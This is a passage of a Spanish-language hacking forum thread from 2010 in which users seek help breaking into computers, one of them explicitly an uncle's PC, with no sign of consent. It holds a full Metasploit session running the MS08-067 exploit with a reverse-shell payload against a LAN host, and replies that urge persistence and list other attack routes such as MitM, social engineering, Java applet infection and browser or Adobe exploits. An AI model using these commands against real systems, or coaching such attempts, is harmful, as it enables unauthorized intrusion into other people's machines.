elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ayuda Nmap y Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Nmap y Metasploit  (Leído 28,997 veces)
xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #20 en: 7 Enero 2010, 20:44 pm »

Como es posible si NMAP me dice que es vulnerable a eso -.-
¿alguna idea? jaja

buena rockernalult me a pasao lo mismo que en la imagen jeje

Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.

Un saludo
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #21 en: 7 Enero 2010, 20:49 pm »

Como es posible si NMAP me dice que es vulnerable a eso -.-

A ver Nmap te lanzo el puerto 6551/tcp bittorrent-tracker, No?
Ok, dentro de los parametros de ejecucion del Exploit windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD

Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.
No te rindas... ;) . Nada es Imposible...

Saludos!
En línea

Te vendería mi talento por poder dormir tranquilo.
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #22 en: 7 Enero 2010, 20:58 pm »

Citar
No tiene nada que ver, mira.

es cierto...  :laugh:
En línea




neuronass

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #23 en: 22 Febrero 2010, 03:36 am »

haber si alguien me ayuda...

escaneo:
Citar
Starting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART
Interesting ports on 192.168.1.100:                           
Not shown: 996 filtered ports                                 
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1025/tcp open   NFS-or-IIS
2869/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds

haber si allguein me pude ayudar..
Citar
____________                                                                                                                                                   
< metasploit >                                                                                                                                                   
 ------------                                                                                                                                                   
       \   ,__,                                                                                                                                                 
        \  (oo)____                                                                                                                                             
           (__)    )\                                                                                                                                           
              ||--|| *                                                                                                                                           
                                                                                                                                                                 

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 524 exploits - 246 auxiliary           
+ -- --=[ 193 payloads - 23 encoders - 8 nops     
       =[ svn r8578 updated today (2010.02.21)   

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
RHOST => 192.168.1.100                               
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp                               
msf exploit(ms08_067_netapi) > show options                         

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.100    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address                   
   LPORT     4444             yes       The local port                     


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102
LHOST => 192.168.1.102                               
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.100    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.102    yes       The local address                   
   LPORT     4444             yes       The local port                     


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 192.168.1.102:4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Triggering the vulnerability...
  • Exploit completed, but no session was created.
En línea

togueter

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #24 en: 23 Febrero 2010, 15:43 pm »

A ver cpu2, por lo que se ve el ordenador de tu tio es vulnerable, busca por ahí si el bittorrent tiene alguna vulnerabilidad. Que esté el puerto de bittorrent abierto no quiere decir que puedas entrar por ahí. Seguramente tb tendrá parcheado el fallo de ms08_067netapi, por eso no te pirula el exploit; así que no hay na que rascar. Buscate otro metodo.
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Ayuda Nmap y Metasploit
« Respuesta #25 en: 23 Febrero 2010, 18:55 pm »

Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!



togueter, WTF!
En línea

Te vendería mi talento por poder dormir tranquilo.
rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #26 en: 23 Febrero 2010, 22:03 pm »

Citar
togueter, WTF!

eso de plano es no saber..... +1
En línea




tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #27 en: 24 Febrero 2010, 13:34 pm »

yo creo que el problema es que veis todo bajo el mismo punto de vista:

-Escaneo host en busca de puertos abiertos / servicios vulnerables
-Metasploit hace el resto por mi...

Qué pasa? que cuando queda parcheado un fallo TYPICAL pues se acaba el juego... hay mil cosas que pueds hacer, para empezar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas ), prueba con ingeniería social... algun tipo de java applet infection ( hay varios posts en este foro sobre ello ), prueba con las 3333 vulnerabilidades que han salido recientemente en productos Adobe ( acrobat reader ) o con las de iexplore ( aurora ) o con las de Firefox... hay muchos caminos y restringirse tan solo al metasploit es lo peor que pueds hacer.

un saludo!
En línea

Colaboraciones:
1 2
togueter

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #28 en: 24 Febrero 2010, 19:03 pm »

...por eso he puesto "buscate otro metodo" refiriendome a que busque otra forma q no sea usar ese exploit.
si me he equivocado lo siento, no hace falta ser groseros, llevo poco tiempo en esto.
En línea

rockernault


Desconectado Desconectado

Mensajes: 2.046


Linux User!!!


Ver Perfil
Re: Ayuda Nmap y Metasploit
« Respuesta #29 en: 24 Febrero 2010, 21:08 pm »

Citar
si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas

que opinas Shell Root??

En línea




Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nmap, Nessus y Metasploit
Dudas Generales
El Gnomo 1 4,592 Último mensaje 10 Enero 2011, 01:27 am
por Shell Root
Nmap, Nessus y Metasploit
Hacking
El Gnomo 2 5,495 Último mensaje 13 Enero 2011, 23:26 pm
por El Gnomo
Ayuda urgente con los NSE de nmap-6.00
Hacking
D4rck4r 2 2,629 Último mensaje 11 Junio 2012, 02:59 am
por D4rck4r
¿Alguien me puede dejar algún manual de nmap y de metasploit?
Seguridad
robertito_prado 3 3,231 Último mensaje 23 Julio 2012, 03:33 am
por robertito_prado
Como agregar nmap 6.01 a el metasploit y armitage
Seguridad
D4rck4r 0 2,144 Último mensaje 10 Agosto 2012, 20:38 pm
por D4rck4r
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines